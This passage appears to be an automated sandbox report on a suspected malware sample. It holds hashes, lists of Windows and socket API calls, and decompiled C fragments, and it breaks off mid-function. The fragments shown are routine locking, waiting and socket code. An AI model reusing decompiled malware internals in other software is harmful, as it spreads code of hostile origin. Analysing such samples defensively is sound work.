                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AD0A73130030897C58027A1EC4AF5A374C9721B00F108833F504E52C2C6FECC90876D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • shutdown.WS2_32(004095ED,00000002), ref: 00409609
                                                                                                                                                                                                                                                                                    • closesocket.WS2_32(004095ED), ref: 00409613
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: closesocketshutdown
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 572888783-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 71ddab89dd3559e3a1cc8f64f726bb8391bb700e1b5d5c06a1592205e9a26df1
                                                                                                                                                                                                                                                                                    • Instruction ID: 8b9c54165bc6db8fc7019d331c3f5ccf6eb5e8133a4e2c667aa1631c2abcc5d3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71ddab89dd3559e3a1cc8f64f726bb8391bb700e1b5d5c06a1592205e9a26df1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DC08C7510430CBBCB00AFA0EC0DDD93B6CEB08240F008050FE098B241CAB2E8808B94
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                                                                    			E00409C80(void* __ecx) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                                                                                                                                    				signed int _t8;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t9 = __ecx;
                                                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				EnterCriticalSection(0x416df4);
                                                                                                                                                                                                                                                                                    				if( *0x416e2c != 0) {
                                                                                                                                                                                                                                                                                    					_t7 =  *0x416e2c; // 0x200
                                                                                                                                                                                                                                                                                    					_t8 = E0040A8B0(_t9, _t7); // executed
                                                                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)(0x416e30 + _t8 * 4));
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				LeaveCriticalSection(0x416df4);
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    0x00409c80
                                                                                                                                                                                                                                                                                    0x00409c83
                                                                                                                                                                                                                                                                                    0x00409c84
                                                                                                                                                                                                                                                                                    0x00409c90
                                                                                                                                                                                                                                                                                    0x00409c9d
                                                                                                                                                                                                                                                                                    0x00409c9f
                                                                                                                                                                                                                                                                                    0x00409ca5
                                                                                                                                                                                                                                                                                    0x00409cb4
                                                                                                                                                                                                                                                                                    0x00409cb4
                                                                                                                                                                                                                                                                                    0x00409cbc
                                                                                                                                                                                                                                                                                    0x00409cc8

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00416DF4), ref: 00409C90
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00416DF4), ref: 00409CBC
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a9d5fdad13c368d851724b758faa1f6e41f7645bce029cf707cb3ba4fe358686
                                                                                                                                                                                                                                                                                    • Instruction ID: 3300fd0fa792e31f75c2b6288bd5323b580414e8241ba1a5816d1c0f679683c1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9d5fdad13c368d851724b758faa1f6e41f7645bce029cf707cb3ba4fe358686
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0E01AB5A01308ABD704EB94FD0AB997BB6A708704F1181B9E80453391D7BAAE90CB5D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00409750() {
                                                                                                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				EnterCriticalSection(0x416df4); // executed
                                                                                                                                                                                                                                                                                    				_t2 = E00409660(_t1); // executed
                                                                                                                                                                                                                                                                                    				LeaveCriticalSection(0x416df4);
                                                                                                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                                                    0x00409758
                                                                                                                                                                                                                                                                                    0x0040975e
                                                                                                                                                                                                                                                                                    0x00409768
                                                                                                                                                                                                                                                                                    0x0040976f

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00416DF4,?,00409E77), ref: 00409758
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00416DF4,?,00409E77), ref: 00409768
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a60cb618b6fcdc4824e79190f1afbed426b092c29353e116cc782c13ad69a138
                                                                                                                                                                                                                                                                                    • Instruction ID: 3d715cb22e8ea6341619d55454cd054b9d9118da8f44f8f672b1f298bfe5042e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a60cb618b6fcdc4824e79190f1afbed426b092c29353e116cc782c13ad69a138
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFB09B3138120D7BC10037B2FC0B9C4376D96047153114076B405500538EFF54C1455D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • send.WS2_32(00000000,00000000,?,00000000), ref: 0040B49F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: send
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2809346765-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3a2ba7345e16d0148971b2019405c9993db53bf2c462389d472c84b3271c0376
                                                                                                                                                                                                                                                                                    • Instruction ID: 0943c11d22ace0310dc8bedf9b54c671e7509ab6556b880e7e43a86ebd11e324
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a2ba7345e16d0148971b2019405c9993db53bf2c462389d472c84b3271c0376
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C013C3490424DEFCB00CFA8C884BDE7BB4FB08304F1085A9EC55A7381D775A695CB95
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                    			E0040B8A0(void* __ecx) {
                                                                                                                                                                                                                                                                                    				LONG* _v8;
                                                                                                                                                                                                                                                                                    				LONG* _t4;
                                                                                                                                                                                                                                                                                    				signed char _t5;
                                                                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t8 = __ecx;
                                                                                                                                                                                                                                                                                    				_push(__ecx); // executed
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t4 = E00409C80(_t8); // executed
                                                                                                                                                                                                                                                                                    					_v8 = _t4;
                                                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    						E0040B700(_v8, 0); // executed
                                                                                                                                                                                                                                                                                    						_t10 = _t10 + 8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t8 =  *0x416e0c; // 0x3ac
                                                                                                                                                                                                                                                                                    					_t5 = WaitForSingleObject(_t8, 0x1388);
                                                                                                                                                                                                                                                                                    					if(_t5 != 0x102) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t5 = E00409EB0();
                                                                                                                                                                                                                                                                                    					if((_t5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t5;
                                                                                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                                                                                    0x0040b8a0
                                                                                                                                                                                                                                                                                    0x0040b8a3
                                                                                                                                                                                                                                                                                    0x0040b8a4
                                                                                                                                                                                                                                                                                    0x0040b8a4
                                                                                                                                                                                                                                                                                    0x0040b8a9
                                                                                                                                                                                                                                                                                    0x0040b8b0
                                                                                                                                                                                                                                                                                    0x0040b8b8
                                                                                                                                                                                                                                                                                    0x0040b8bd
                                                                                                                                                                                                                                                                                    0x0040b8bd
                                                                                                                                                                                                                                                                                    0x0040b8c5
                                                                                                                                                                                                                                                                                    0x0040b8cc
                                                                                                                                                                                                                                                                                    0x0040b8d7
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b8d9
                                                                                                                                                                                                                                                                                    0x0040b8e3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b8e3
                                                                                                                                                                                                                                                                                    0x0040b8e8

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409C80: EnterCriticalSection.KERNEL32(00416DF4), ref: 00409C90
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409C80: LeaveCriticalSection.KERNEL32(00416DF4), ref: 00409CBC
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000003AC,00001388), ref: 0040B8CC
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040B700: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040B70C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3309573332-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2fc1f42d96d65b8328a9b9c597bf448764fd98d6a80d87194b77a64c7ee2843b
                                                                                                                                                                                                                                                                                    • Instruction ID: efa3576df14e11bfc6155eae5cdafd2df28e95e4285d6ef1167b438f43f5b0f7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fc1f42d96d65b8328a9b9c597bf448764fd98d6a80d87194b77a64c7ee2843b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7E092B1900308A6D714E7A19C06B9F7369DB50305F14807AF900762D2DB7E9E44D3DC
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004058E0
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 542301482-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 752613992cec3424fc6ca12a41fd8d19352ac516dba71492bf2cb6d9fba5c085
                                                                                                                                                                                                                                                                                    • Instruction ID: 7816046bdeee9aa600e7d84e322e250ab42cf7bed1fe902a3a89055fcaf0bfc5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 752613992cec3424fc6ca12a41fd8d19352ac516dba71492bf2cb6d9fba5c085
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29E0ED7590020CFFDF00DF94C889BDEBBB8EB08315F10C1A9E90467280D7B55A94DB95
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                    			E00407DD0(intOrPtr _a4, intOrPtr* _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _t90;
                                                                                                                                                                                                                                                                                    				intOrPtr _t109;
                                                                                                                                                                                                                                                                                    				intOrPtr _t110;
                                                                                                                                                                                                                                                                                    				signed int _t120;
                                                                                                                                                                                                                                                                                    				intOrPtr _t137;
                                                                                                                                                                                                                                                                                    				signed int _t138;
                                                                                                                                                                                                                                                                                    				intOrPtr _t143;
                                                                                                                                                                                                                                                                                    				void* _t144;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if(_a8 != 0) {
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_a8 + 0x10c)) != 0) {
                                                                                                                                                                                                                                                                                    						if(_a12 >= 0) {
                                                                                                                                                                                                                                                                                    							if(_a12 < 0x1c) {
                                                                                                                                                                                                                                                                                    								_t109 = _a8;
                                                                                                                                                                                                                                                                                    								asm("adc eax, 0x0");
                                                                                                                                                                                                                                                                                    								_t110 = _a8;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t110 + 0x118)) =  *((intOrPtr*)(_t109 + 0x118)) + 1;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t110 + 0x11c)) =  *((intOrPtr*)(_t109 + 0x11c));
                                                                                                                                                                                                                                                                                    								if(_a12 == 1) {
                                                                                                                                                                                                                                                                                    									if(_a12 >=  *((intOrPtr*)(_a8 + 0x16c)) + 1) {
                                                                                                                                                                                                                                                                                    										_t23 = (_a12 << 9) + 0x1f8; // 0x1f8
                                                                                                                                                                                                                                                                                    										E00407A40(_a12 << 9, _a8 + _t23, 0x30);
                                                                                                                                                                                                                                                                                    										_t144 = _t144 + 8;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										_t19 = (_a12 << 9) + 0x178; // 0x178
                                                                                                                                                                                                                                                                                    										E00407A40(_a12 << 9, _a8 + _t19, 0x40);
                                                                                                                                                                                                                                                                                    										_t144 = _t144 + 8;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_v8 = 0x1000 -  *(_a8 + 0x3b78 + _a12 * 4);
                                                                                                                                                                                                                                                                                    								_t33 = (_a12 << 9) + 0x178; // 0x178
                                                                                                                                                                                                                                                                                    								_t90 = E00407730(_a4, 0x4110a8, _a8 + 0x128, _a12,  *((intOrPtr*)(_a8 + 0x3bf0 + _a12 * 8)),  *((intOrPtr*)(_a8 + 0x170)),  *((intOrPtr*)(_a8 + 0x16c)), _a16, _v8,  *((intOrPtr*)(_a8 + 0x168)),  *_a8, _a8 + _t33); // executed
                                                                                                                                                                                                                                                                                    								_v12 = _t90;
                                                                                                                                                                                                                                                                                    								if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    									 *(_a8 + 0x3b78 + _a12 * 4) = 0;
                                                                                                                                                                                                                                                                                    									_t120 = _a12;
                                                                                                                                                                                                                                                                                    									_t137 = _a8;
                                                                                                                                                                                                                                                                                    									asm("adc ecx, 0x0");
                                                                                                                                                                                                                                                                                    									_t138 = _a12;
                                                                                                                                                                                                                                                                                    									_t143 = _a8;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t143 + 0x3bf0 + _t138 * 8)) =  *((intOrPtr*)(_t137 + 0x3bf0 + _t120 * 8)) + 1;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t143 + 0x3bf4 + _t138 * 8)) =  *((intOrPtr*)(_t137 + 0x3bf4 + _t120 * 8));
                                                                                                                                                                                                                                                                                    									_t78 = (_a12 << 9) + 0x178; // 0x178
                                                                                                                                                                                                                                                                                    									memset(_a8 + _t78, 0, 0x200);
                                                                                                                                                                                                                                                                                    									return 0;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									return _v12;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							return 7;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						return 6;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return 5;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return 3;
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    0x00407ddb
                                                                                                                                                                                                                                                                                    0x00407df1
                                                                                                                                                                                                                                                                                    0x00407e01
                                                                                                                                                                                                                                                                                    0x00407e11
                                                                                                                                                                                                                                                                                    0x00407e1d
                                                                                                                                                                                                                                                                                    0x00407e2f
                                                                                                                                                                                                                                                                                    0x00407e32
                                                                                                                                                                                                                                                                                    0x00407e35
                                                                                                                                                                                                                                                                                    0x00407e3b
                                                                                                                                                                                                                                                                                    0x00407e45
                                                                                                                                                                                                                                                                                    0x00407e56
                                                                                                                                                                                                                                                                                    0x00407e80
                                                                                                                                                                                                                                                                                    0x00407e88
                                                                                                                                                                                                                                                                                    0x00407e8d
                                                                                                                                                                                                                                                                                    0x00407e58
                                                                                                                                                                                                                                                                                    0x00407e63
                                                                                                                                                                                                                                                                                    0x00407e6b
                                                                                                                                                                                                                                                                                    0x00407e70
                                                                                                                                                                                                                                                                                    0x00407e70
                                                                                                                                                                                                                                                                                    0x00407e56
                                                                                                                                                                                                                                                                                    0x00407ea2
                                                                                                                                                                                                                                                                                    0x00407eae
                                                                                                                                                                                                                                                                                    0x00407f06
                                                                                                                                                                                                                                                                                    0x00407f0e
                                                                                                                                                                                                                                                                                    0x00407f15
                                                                                                                                                                                                                                                                                    0x00407f22
                                                                                                                                                                                                                                                                                    0x00407f2d
                                                                                                                                                                                                                                                                                    0x00407f30
                                                                                                                                                                                                                                                                                    0x00407f44
                                                                                                                                                                                                                                                                                    0x00407f47
                                                                                                                                                                                                                                                                                    0x00407f4a
                                                                                                                                                                                                                                                                                    0x00407f4d
                                                                                                                                                                                                                                                                                    0x00407f54
                                                                                                                                                                                                                                                                                    0x00407f6b
                                                                                                                                                                                                                                                                                    0x00407f73
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00407f17
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00407f17
                                                                                                                                                                                                                                                                                    0x00407f15
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00407e13
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00407e03
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00407df3
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: eab46de57b716372fa8e45db85e8d0b0ca98770621bbc4f1f376e9e850becdfa
                                                                                                                                                                                                                                                                                    • Instruction ID: 00411f99aa306340168d7e6a15dd4c4228c0ff99c90915b9e83544fa731dbb59
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eab46de57b716372fa8e45db85e8d0b0ca98770621bbc4f1f376e9e850becdfa
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC514C74A0420A9BDB04CF08C895FEA73A5FF48318F10857AF9299B381D735EA52CB85
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00409F60(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                                                                                                                                                                                    				signed int* _v8;
                                                                                                                                                                                                                                                                                    				signed int* _v12;
                                                                                                                                                                                                                                                                                    				signed int _t30;
                                                                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                                                                                                    				void* _t75;
